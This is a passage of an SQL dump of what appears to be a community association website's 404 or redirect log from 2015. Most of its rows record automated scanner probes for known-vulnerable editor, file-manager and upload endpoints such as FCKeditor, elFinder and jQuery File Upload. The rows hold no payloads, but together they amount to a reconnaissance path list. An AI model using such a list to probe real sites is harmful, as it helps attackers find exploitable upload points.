00:00:00'),(1130,'http://hallcrestheights.org/system/webeditor','','','',1,0,'2015-03-26 01:45:12','0000-00-00 00:00:00'),(1131,'http://hallcrestheights.org/webeditor','','','',1,0,'2015-03-26 01:45:13','0000-00-00 00:00:00'),(1132,'http://hallcrestheights.org/editor/','','','',1,0,'2015-03-26 01:45:13','0000-00-00 00:00:00'),(1133,'http://hallcrestheights.org/oledit/','','','',1,0,'2015-03-26 01:45:13','0000-00-00 00:00:00'),(1134,'http://hallcrestheights.org/news_manager/eWebEditor','','','',1,0,'2015-03-26 01:45:13','0000-00-00 00:00:00'),(1135,'http://hallcrestheights.org/system/%23ewebeditor/','','','',1,0,'2015-03-26 01:45:13','0000-00-00 00:00:00'),(1136,'http://hallcrestheights.org/jleditor/','','','',1,0,'2015-03-26 01:45:14','0000-00-00 00:00:00'),(1137,'http://hallcrestheights.org/%23ewebeditor/','','','',1,0,'2015-03-26 01:45:14','0000-00-00 00:00:00'),(1138,'http://hallcrestheights.org/ewebeditor1/','','','',1,0,'2015-03-26 01:45:14','0000-00-00 00:00:00'),(1139,'http://hallcrestheights.org/manage/webeditor','','','',1,0,'2015-03-26 01:45:14','0000-00-00 00:00:00'),(1140,'http://hallcrestheights.org/xmlEditor/eWebEditor','','','',1,0,'2015-03-26 01:45:14','0000-00-00 00:00:00'),(1141,'http://hallcrestheights.org/htmledit/','','','',1,0,'2015-03-26 01:45:15','0000-00-00 00:00:00'),(1142,'http://hallcrestheights.org/southidceditor/','','','',1,0,'2015-03-26 01:45:15','0000-00-00 00:00:00'),(1143,'http://hallcrestheights.org/webedit/','','','',1,0,'2015-03-26 01:45:15','0000-00-00 00:00:00'),(1144,'http://hallcrestheights.org/scripts/ewebeditor/','','','',1,0,'2015-03-26 01:45:15','0000-00-00 00:00:00'),(1145,'http://hallcrestheights.org/editors/ewebeditor/','','','',1,0,'2015-03-26 01:45:15','0000-00-00 00:00:00'),(1146,'http://hallcrestheights.org/ewebeditor/','','','',1,0,'2015-03-26 01:45:16','0000-00-00 00:00:00'),(1147,'http://hallcrestheights.org/htmlEditor/eWebEditor','','','',1,0,'2015-03-26 01:45:16','0000-00-00 00:00:00'),(1148,'http://hallcrestheights.org/admin/webedit/','','','',1,0,'2015-03-26 01:45:16','0000-00-00 00:00:00'),(1149,'http://hallcrestheights.org/admin/ewebeditor1/','','','',1,0,'2015-03-26 01:45:16','0000-00-00 00:00:00'),(1150,'http://hallcrestheights.org/manage/oledit/','','','',1,0,'2015-03-26 01:45:16','0000-00-00 00:00:00'),(1151,'http://hallcrestheights.org/z_editor/','','','',1,0,'2015-03-26 01:45:17','0000-00-00 00:00:00'),(1152,'http://hallcrestheights.org/manage/%23ewebeditor/','','','',1,0,'2015-03-26 01:45:17','0000-00-00 00:00:00'),(1153,'http://hallcrestheights.org/system/z_editor/','','','',1,0,'2015-03-26 01:45:17','0000-00-00 00:00:00'),(1154,'http://hallcrestheights.org/manage/z_editor/','','','',1,0,'2015-03-26 01:45:17','0000-00-00 00:00:00'),(1155,'http://hallcrestheights.org/manage/editor/','','','',1,0,'2015-03-26 01:45:17','0000-00-00 00:00:00'),(1156,'http://hallcrestheights.org/web/ewebeditor/','','','',1,0,'2015-03-26 01:45:18','0000-00-00 00:00:00'),(1157,'http://hallcrestheights.org/system/web_editor/','','','',1,0,'2015-03-26 01:45:18','0000-00-00 00:00:00'),(1158,'http://hallcrestheights.org/webstat/','','','',1,0,'2015-03-27 08:17:53','0000-00-00 00:00:00'),(1159,'http://www.hallcrestheights.org/files/HOA_Newsletters_December','','http://eramebel.com/korpusnaya_mebel/shkafy_kupe','',1,0,'2015-03-30 08:15:23','0000-00-00 00:00:00'),(1160,'http://hallcrestheights.org/+','','','',1,0,'2015-03-31 04:21:58','0000-00-00 00:00:00'),(1161,'http://www.hallcrestheights.org/community/neighborhood-guide.html/trackback/','','http://www.hallcrestheights.org/community/neighborhood-guide.html','',1,0,'2015-04-04 17:16:25','0000-00-00 00:00:00'),(1162,'http://hallcrestheights.org/association/privacy-policy.html','','','',1,0,'2015-04-10 01:34:45','0000-00-00 00:00:00'),(1163,'http://hallcrestheights.org/editors/fckeditor/editor/filemanager/upload/test.html','','','',1,0,'2015-04-11 19:32:28','0000-00-00 00:00:00'),(1164,'http://hallcrestheights.org/admin/editors/fckeditor/editor/filemanager/upload/test.html','','','',1,0,'2015-04-11 19:32:28','0000-00-00 00:00:00'),(1165,'http://hallcrestheights.org/admin/FCKeditor/editor/filemanager/upload/test.html','','','',1,0,'2015-04-11 19:32:29','0000-00-00 00:00:00'),(1166,'http://hallcrestheights.org/FCKeditor/editor/filemanager/upload/test.html','','','',1,0,'2015-04-11 19:32:29','0000-00-00 00:00:00'),(1167,'http://www.hallcrestheights.org/m/','','','',1,0,'2015-04-14 08:55:10','0000-00-00 00:00:00'),(1168,'http://www.hallcrestheights.org/mobile/','','','',1,0,'2015-04-14 09:23:45','0000-00-00 00:00:00'),(1169,'http://hallcrestheights.org/components/com_sexycontactform/fileupload/index.php','','','',25,0,'2015-04-16 20:25:39','0000-00-00 00:00:00'),(1170,'http://www.hallcrestheights.org/panel/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:17','0000-00-00 00:00:00'),(1171,'http://www.hallcrestheights.org/admin/panel/fckeditor/fckeditor.html','','','',1,0,'2015-04-17 06:05:17','0000-00-00 00:00:00'),(1172,'http://www.hallcrestheights.org/site/mambots/editors/fckeditor/fckeditor.html','','','',1,0,'2015-04-17 06:05:18','0000-00-00 00:00:00'),(1173,'http://www.hallcrestheights.org/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:18','0000-00-00 00:00:00'),(1174,'http://www.hallcrestheights.org/admin/templates/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:19','0000-00-00 00:00:00'),(1175,'http://www.hallcrestheights.org/include/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:20','0000-00-00 00:00:00'),(1176,'http://www.hallcrestheights.org/modules/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:20','0000-00-00 00:00:00'),(1177,'http://www.hallcrestheights.org/admin/templates/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:21','0000-00-00 00:00:00'),(1178,'http://www.hallcrestheights.org/webyep-system/programm/opt/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:23','0000-00-00 00:00:00'),(1179,'http://www.hallcrestheights.org/outils/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:24','0000-00-00 00:00:00'),(1180,'http://www.hallcrestheights.org/wspro/html/js/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:24','0000-00-00 00:00:00'),(1181,'http://www.hallcrestheights.org/portal/html/js/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:25','0000-00-00 00:00:00'),(1182,'http://www.hallcrestheights.org/gestion/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:26','0000-00-00 00:00:00'),(1183,'http://www.hallcrestheights.org/site/modules/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:26','0000-00-00 00:00:00'),(1184,'http://www.hallcrestheights.org/public/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:27','0000-00-00 00:00:00'),(1185,'http://www.hallcrestheights.org/V2/utils/WYSEditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:28','0000-00-00 00:00:00'),(1186,'http://www.hallcrestheights.org/fhadmin/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:28','0000-00-00 00:00:00'),(1187,'http://www.hallcrestheights.org/admin/actualites4/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:29','0000-00-00 00:00:00'),(1188,'http://www.hallcrestheights.org/resorce/admin/article/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:29','0000-00-00 00:00:00'),(1189,'http://www.hallcrestheights.org/site/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:30','0000-00-00 00:00:00'),(1190,'http://www.hallcrestheights.org/pebble/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:30','0000-00-00 00:00:00'),(1191,'http://www.hallcrestheights.org/new2/admin/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:31','0000-00-00 00:00:00'),(1192,'http://www.hallcrestheights.org/lists/admin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:32','0000-00-00 00:00:00'),(1193,'http://www.hallcrestheights.org/web-local/fak/rj/admin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:32','0000-00-00 00:00:00'),(1194,'http://www.hallcrestheights.org/novice/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:33','0000-00-00 00:00:00'),(1195,'http://www.hallcrestheights.org/webmail/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:33','0000-00-00 00:00:00'),(1196,'http://www.hallcrestheights.org/sites/all/libraries/fckeditor/fckeditor.html','','','',1,0,'2015-04-17 06:05:34','0000-00-00 00:00:00'),(1197,'http://www.hallcrestheights.org/diendan/media/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:34','0000-00-00 00:00:00'),(1198,'http://www.hallcrestheights.org/public_html/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:35','0000-00-00 00:00:00'),(1199,'http://www.hallcrestheights.org/artsconnect/newsite/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:36','0000-00-00 00:00:00'),(1200,'http://www.hallcrestheights.org/include/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:36','0000-00-00 00:00:00'),(1201,'http://www.hallcrestheights.org/mailing/tools/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:37','0000-00-00 00:00:00'),(1202,'http://www.hallcrestheights.org/library/fckeditor/editor/fckeditor.html','','','',1,0,'2015-04-17 06:05:37','0000-00-00 00:00:00'),(1203,'http://hallcrestheights.org/blog/administrator/index.php','','','',2,0,'2015-04-17 16:22:46','0000-00-00 00:00:00'),(1204,'http://hallcrestheights.org/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2015-04-19 11:43:01','0000-00-00 00:00:00'),(1205,'http://hallcrestheights.org/sites/all/libraries/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:44','0000-00-00 00:00:00'),(1206,'http://hallcrestheights.org/drupal/sites/all/libraries/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:45','0000-00-00 00:00:00'),(1207,'http://hallcrestheights.org/elfinder.php.html','','','',1,0,'2015-04-20 15:32:45','0000-00-00 00:00:00'),(1208,'http://hallcrestheights.org/sites/all/modules/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:45','0000-00-00 00:00:00'),(1209,'http://hallcrestheights.org/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:46','0000-00-00 00:00:00'),(1210,'http://hallcrestheights.org/finder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:46','0000-00-00 00:00:00'),(1211,'http://hallcrestheights.org/js/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:46','0000-00-00 00:00:00'),(1212,'http://hallcrestheights.org/scripts/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:46','0000-00-00 00:00:00'),(1213,'http://hallcrestheights.org/public/scripts/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:47','0000-00-00 00:00:00'),(1214,'http://hallcrestheights.org/html/lib/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:47','0000-00-00 00:00:00'),(1215,'http://hallcrestheights.org/lib/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:47','0000-00-00 00:00:00'),(1216,'http://hallcrestheights.org/admin/elfinder/elfinder.php.html','','','',1,0,'2015-04-20 15:32:47','0000-00-00 00:00:00'),(1217,'http://hallcrestheights.org/sites/all/libraries/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:48','0000-00-00 00:00:00'),(1218,'http://hallcrestheights.org/lib/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:48','0000-00-00 00:00:00'),(1219,'http://hallcrestheights.org/assets/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:48','0000-00-00 00:00:00'),(1220,'http://hallcrestheights.org/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:49','0000-00-00 00:00:00'),(1221,'http://hallcrestheights.org/elfinder.html','','','',1,0,'2015-04-20 15:32:49','0000-00-00 00:00:00'),(1222,'http://hallcrestheights.org/core/ckeditor/plugins/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:49','0000-00-00 00:00:00'),(1223,'http://hallcrestheights.org/js/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:49','0000-00-00 00:00:00'),(1224,'http://hallcrestheights.org/sites/all/modules/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:50','0000-00-00 00:00:00'),(1225,'http://hallcrestheights.org/scripts/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:50','0000-00-00 00:00:00'),(1226,'http://hallcrestheights.org/filemanager/elfinder.html','','','',1,0,'2015-04-20 15:32:50','0000-00-00 00:00:00'),(1227,'http://hallcrestheights.org/edit/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:50','0000-00-00 00:00:00'),(1228,'http://hallcrestheights.org/modules/tadtools/ckeditor/elFinder/elfinder.html','','','',1,0,'2015-04-20 15:32:51','0000-00-00 00:00:00'),(1229,'http://hallcrestheights.org/components/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:51','0000-00-00 00:00:00'),(1230,'http://hallcrestheights.org/media/js/plugins/elfinder2.0/elfinder.html','','','',1,0,'2015-04-20 15:32:52','0000-00-00 00:00:00'),(1231,'http://hallcrestheights.org/js/plugins/elfinder2.0/elfinder.html','','','',1,0,'2015-04-20 15:32:52','0000-00-00 00:00:00'),(1232,'http://hallcrestheights.org/vendor/mihaildev/yii2-elfinder/assets/elfinder.html','','','',1,0,'2015-04-20 15:32:52','0000-00-00 00:00:00'),(1233,'http://hallcrestheights.org/themes/admin/js/plugins/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:52','0000-00-00 00:00:00'),(1234,'http://hallcrestheights.org/js/lib/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:53','0000-00-00 00:00:00'),(1235,'http://hallcrestheights.org/System/Plugins/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:53','0000-00-00 00:00:00'),(1236,'http://hallcrestheights.org/blog/elfinder.html','','','',1,0,'2015-04-20 15:32:53','0000-00-00 00:00:00'),(1237,'http://hallcrestheights.org/assets/lib/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:53','0000-00-00 00:00:00'),(1238,'http://hallcrestheights.org/bdfiles/elfinder.html','','','',1,0,'2015-04-20 15:32:54','0000-00-00 00:00:00'),(1239,'http://hallcrestheights.org/ckeditor/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:54','0000-00-00 00:00:00'),(1240,'http://hallcrestheights.org/finder/elfinder.html','','','',1,0,'2015-04-20 15:32:54','0000-00-00 00:00:00'),(1241,'http://hallcrestheights.org/4dm1n/assets/js/ckfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:54','0000-00-00 00:00:00'),(1242,'http://hallcrestheights.org/4_demo/js/lib/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:55','0000-00-00 00:00:00'),(1243,'http://hallcrestheights.org/en/ckfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:55','0000-00-00 00:00:00'),(1244,'http://hallcrestheights.org/admin/assets/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:55','0000-00-00 00:00:00'),(1245,'http://hallcrestheights.org/w/elfinder-2.0-rc1/elfinder.html','','','',1,0,'2015-04-20 15:32:55','0000-00-00 00:00:00'),(1246,'http://hallcrestheights.org/home/assets/js/ckfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:56','0000-00-00 00:00:00'),(1247,'http://hallcrestheights.org/assets/lib/elfinder-2.0-rc1/elfinder.html','','','',1,0,'2015-04-20 15:32:56','0000-00-00 00:00:00'),(1248,'http://hallcrestheights.org/module-assets/admin/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:56','0000-00-00 00:00:00'),(1249,'http://hallcrestheights.org/var/ckeditor/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:56','0000-00-00 00:00:00'),(1250,'http://hallcrestheights.org/resources/html_editor/ckfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:57','0000-00-00 00:00:00'),(1251,'http://hallcrestheights.org/assets/components/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:57','0000-00-00 00:00:00'),(1252,'http://hallcrestheights.org/components/elfinder/files/elfinder.html','','','',1,0,'2015-04-20 15:32:57','0000-00-00 00:00:00'),(1253,'http://hallcrestheights.org/public/elfinder/elfinder.html','','','',1,0,'2015-04-20 15:32:57','0000-00-00 00:00:00'),(1254,'http://hallcrestheights.org/typo3/index.php','','','',1,0,'2015-04-27 16:14:51','0000-00-00 00:00:00'),(1255,'http://hallcrestheights.org/admin/index.php','','','',7,0,'2015-05-01 06:28:43','0000-00-00 00:00:00'),(1256,'http://hallcrestheights.org/survey.html','','http://hallcrestheights.org/','',43,0,'2015-05-05 00:48:46','0000-00-00 00:00:00'),(1257,'http://hallcrestheights.org/components/com_rsfiles/index.html','','http://hallcrestheights.org/components/com_rsfiles/index.html','',1,0,'2015-05-05 13:28:30','0000-00-00 00:00:00'),(1258,'http://hallcrestheights.org/components/com_spidercalendar/index.html','','http://hallcrestheights.org/components/com_spidercalendar/index.html','',1,0,'2015-05-06 00:28:05','0000-00-00 00:00:00'),(1259,'http://hallcrestheights.org/%EF%BF%BD1%10%01?o=3&g=&s=&z=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD?','','http://hallcrestheights.org/','',1,0,'2015-05-07 18:26:06','0000-00-00 00:00:00'),(1260,'http://hallcrestheights.org/community/privacy-policy.html','','','',1,0,'2015-05-15 23:56:52','0000-00-00 00:00:00'),(1261,'http://hallcrestheights.org/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','','','',1,0,'2015-05-23 05:19:12','0000-00-00 00:00:00'),(1262,'http://hallcrestheights.org/includes/index.php','','','',1,0,'2015-05-23 19:35:12','0000-00-00 00:00:00'),(1263,'http://hallcrestheights.org/tmp/index.php','','','',4,0,'2015-05-24 01:02:19','0000-00-00 00:00:00'),(1264,'http://www.hallcrestheights.org/include/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/include/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:03','0000-00-00 00:00:00'),(1265,'http://www.hallcrestheights.org/files/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/files/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:03','0000-00-00 00:00:00'),(1266,'http://www.hallcrestheights.org/manage/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/manage/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:04','0000-00-00 00:00:00'),(1267,'http://www.hallcrestheights.org/public/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/public/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:04','0000-00-00 00:00:00'),(1268,'http://www.hallcrestheights.org/lib/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/lib/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:04','0000-00-00 00:00:00'),(1269,'http://www.hallcrestheights.org/control/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/control/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:04','0000-00-00 00:00:00'),(1270,'http://www.hallcrestheights.org/addons/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/addons/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:04','0000-00-00 00:00:00'),(1271,'http://www.hallcrestheights.org/system/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/system/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:05','0000-00-00 00:00:00'),(1272,'http://www.hallcrestheights.org/inc/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/inc/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:05','0000-00-00 00:00:00'),(1273,'http://www.hallcrestheights.org/assets/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/assets/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:05','0000-00-00 00:00:00'),(1274,'http://www.hallcrestheights.org/manager/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/manager/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:05','0000-00-00 00:00:00'),(1275,'http://www.hallcrestheights.org/files/filebox/File/fileUpload.Html','','http://www.hallcrestheights.org/files/filebox/File/fileUpload.Html','',1,0,'2015-05-24 05:12:05','0000-00-00 00:00:00'),(1276,'http://www.hallcrestheights.org/includes/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/includes/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:06','0000-00-00 00:00:00'),(1277,'http://www.hallcrestheights.org/automne/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/automne/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-05-24 05:12:06','0000-00-00 00:00:00'),(1278,'http://hallcrestheights.org/survey%20html','','','',1,0,'2015-05-25 18:41:11','0000-00-00 00:00:00'),(1279,'http://hallcrestheights.org/agqwqfs','','http://hallcrestheights.org/agqwqfs','',1,0,'2015-05-26 06:04:55','0000-00-00 00:00:00'),(1280,'http://www.hallcrestheights.org/th1s_1s_a_4o4.html','','http://www.google.com/url?url=www.hallcrestheights.org&yahoo.com','',1,0,'2015-05-26 22:54:42','0000-00-00 00:00:00'),(1281,'http://www.hallcrestheights.org/media/system/js/s?=1','','','',1,0,'2015-05-26 22:55:06','0000-00-00 00:00:00'),(1282,'http://www.hallcrestheights.org/a','','','',1,0,'2015-05-26 22:55:09','0000-00-00 00:00:00'),(1283,'http://hallcrestheights.org/wp-content/plugins/formcraft/file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:56','0000-00-00 00:00:00'),(1284,'http://hallcrestheights.org/server/php/index.php','','','',1,0,'2015-06-02 17:25:56','0000-00-00 00:00:00'),(1285,'http://hallcrestheights.org/admin/assets/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:57','0000-00-00 00:00:00'),(1286,'http://hallcrestheights.org/admin/assets/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:57','0000-00-00 00:00:00'),(1287,'http://hallcrestheights.org/assets/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:58','0000-00-00 00:00:00'),(1288,'http://hallcrestheights.org/admin/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:58','0000-00-00 00:00:00'),(1289,'http://hallcrestheights.org/admin/server/php/index.php','','','',1,0,'2015-06-02 17:25:58','0000-00-00 00:00:00'),(1290,'http://hallcrestheights.org/upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:59','0000-00-00 00:00:00'),(1291,'http://hallcrestheights.org/assets/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:25:59','0000-00-00 00:00:00'),(1292,'http://hallcrestheights.org/uploader/server/php/index.php','','','',1,0,'2015-06-02 17:26:00','0000-00-00 00:00:00'),(1293,'http://hallcrestheights.org/test/upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:00','0000-00-00 00:00:00'),(1294,'http://hallcrestheights.org/app/webroot/server/php/index.php','','','',1,0,'2015-06-02 17:26:01','0000-00-00 00:00:00'),(1295,'http://hallcrestheights.org/polyfinal/app/webroot/administration/js/file-uploader/server/php/index.php','','','',1,0,'2015-06-02 17:26:01','0000-00-00 00:00:00'),(1296,'http://hallcrestheights.org/jQuery-File-Upload-master/server/php/index.php','','','',1,0,'2015-06-02 17:26:01','0000-00-00 00:00:00'),(1297,'http://hallcrestheights.org/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:02','0000-00-00 00:00:00'),(1298,'http://hallcrestheights.org/js/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:02','0000-00-00 00:00:00'),(1299,'http://hallcrestheights.org/metronic/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:03','0000-00-00 00:00:00'),(1300,'http://hallcrestheights.org/tema/admin/plugins/file-uploader/server/php/index.php','','','',1,0,'2015-06-02 17:26:03','0000-00-00 00:00:00'),(1301,'http://hallcrestheights.org/metronic/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:04','0000-00-00 00:00:00'),(1302,'http://hallcrestheights.org/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:04','0000-00-00 00:00:00'),(1303,'http://hallcrestheights.org/admin/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:05','0000-00-00 00:00:00'),(1304,'http://hallcrestheights.org/admin/js/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:05','0000-00-00 00:00:00'),(1305,'http://hallcrestheights.org/upload_server/server/php/index.php','','','',1,0,'2015-06-02 17:26:06','0000-00-00 00:00:00'),(1306,'http://hallcrestheights.org/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:06','0000-00-00 00:00:00'),(1307,'http://hallcrestheights.org/file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:07','0000-00-00 00:00:00'),(1308,'http://hallcrestheights.org/plugin/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:07','0000-00-00 00:00:00'),(1309,'http://hallcrestheights.org/admin/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:08','0000-00-00 00:00:00'),(1310,'http://hallcrestheights.org/js/file-uploader/server/php/index.php','','','',1,0,'2015-06-02 17:26:08','0000-00-00 00:00:00'),(1311,'http://hallcrestheights.org/blueimp/server/php/index.php','','','',1,0,'2015-06-02 17:26:09','0000-00-00 00:00:00'),(1312,'http://hallcrestheights.org/modules/cvjqueryext/lib/jquery-configurateurvisuel/lib/jquery-fileupload/server/php/index.php','','','',1,0,'2015-06-02 17:26:09','0000-00-00 00:00:00'),(1313,'http://hallcrestheights.org/admin/upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:10','0000-00-00 00:00:00'),(1314,'http://hallcrestheights.org/test/assets/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:10','0000-00-00 00:00:00'),(1315,'http://hallcrestheights.org/media/server/php/index.php','','','',1,0,'2015-06-02 17:26:11','0000-00-00 00:00:00'),(1316,'http://hallcrestheights.org/assets/js/vendor/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:11','0000-00-00 00:00:00'),(1317,'http://hallcrestheights.org/multiplefileupload/server/php/index.php','','','',1,0,'2015-06-02 17:26:12','0000-00-00 00:00:00'),(1318,'http://hallcrestheights.org/metronic/theme_rtl/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:12','0000-00-00 00:00:00'),(1319,'http://hallcrestheights.org/assets/admin/jquery-file-upload/server/php/index.php','','','',1,0,'2015-06-02 17:26:13','0000-00-00 00:00:00'),(1320,'http://www.hallcrestheights.org/bitrix/admin/index.php?lang=en','','','',7,0,'2015-06-04 07:53:35','0000-00-00 00:00:00'),(1321,'http://www.hallcrestheights.org/admin/index.php','','','',2,0,'2015-06-04 07:53:36','0000-00-00 00:00:00'),(1322,'http://www.hallcrestheights.org/fckeditor/editor/filemanager/connectors/uploadtest.html','','http://www.hallcrestheights.org/fckeditor/editor/filemanager/connectors/uploadtest.html','',1,0,'2015-06-06 14:29:50','0000-00-00 00:00:00'),(1323,'http://www.hallcrestheights.org/webalizer/usage_201506.html','','http://www.hallcrestheights.org/webalizer/usage_201506.html','',1,0,'2015-06-07 11:10:59','0000-00-00 00:00:00'),(1324,'http://www.hallcrestheights.org/stats/usage_201506.html','','http://www.hallcrestheights.org/stats/usage_201506.html','',1,0,'2015-06-08 12:11:03','0000-00-00 00:00:00'),(1325,'http://www.hallcrestheights.org/dekra/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-10 04:29:30','0000-00-00 00:00:00'),(1326,'http://www.hallcrestheights.org/c4sql8-solidarieta/html/images_sys/fckeditor.o/editor/fckeditor.html','','','',1,0,'2015-06-10 04:29:30','0000-00-00 00:00:00'),(1327,'http://www.hallcrestheights.org/adminicpsb/script/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-10 04:29:30','0000-00-00 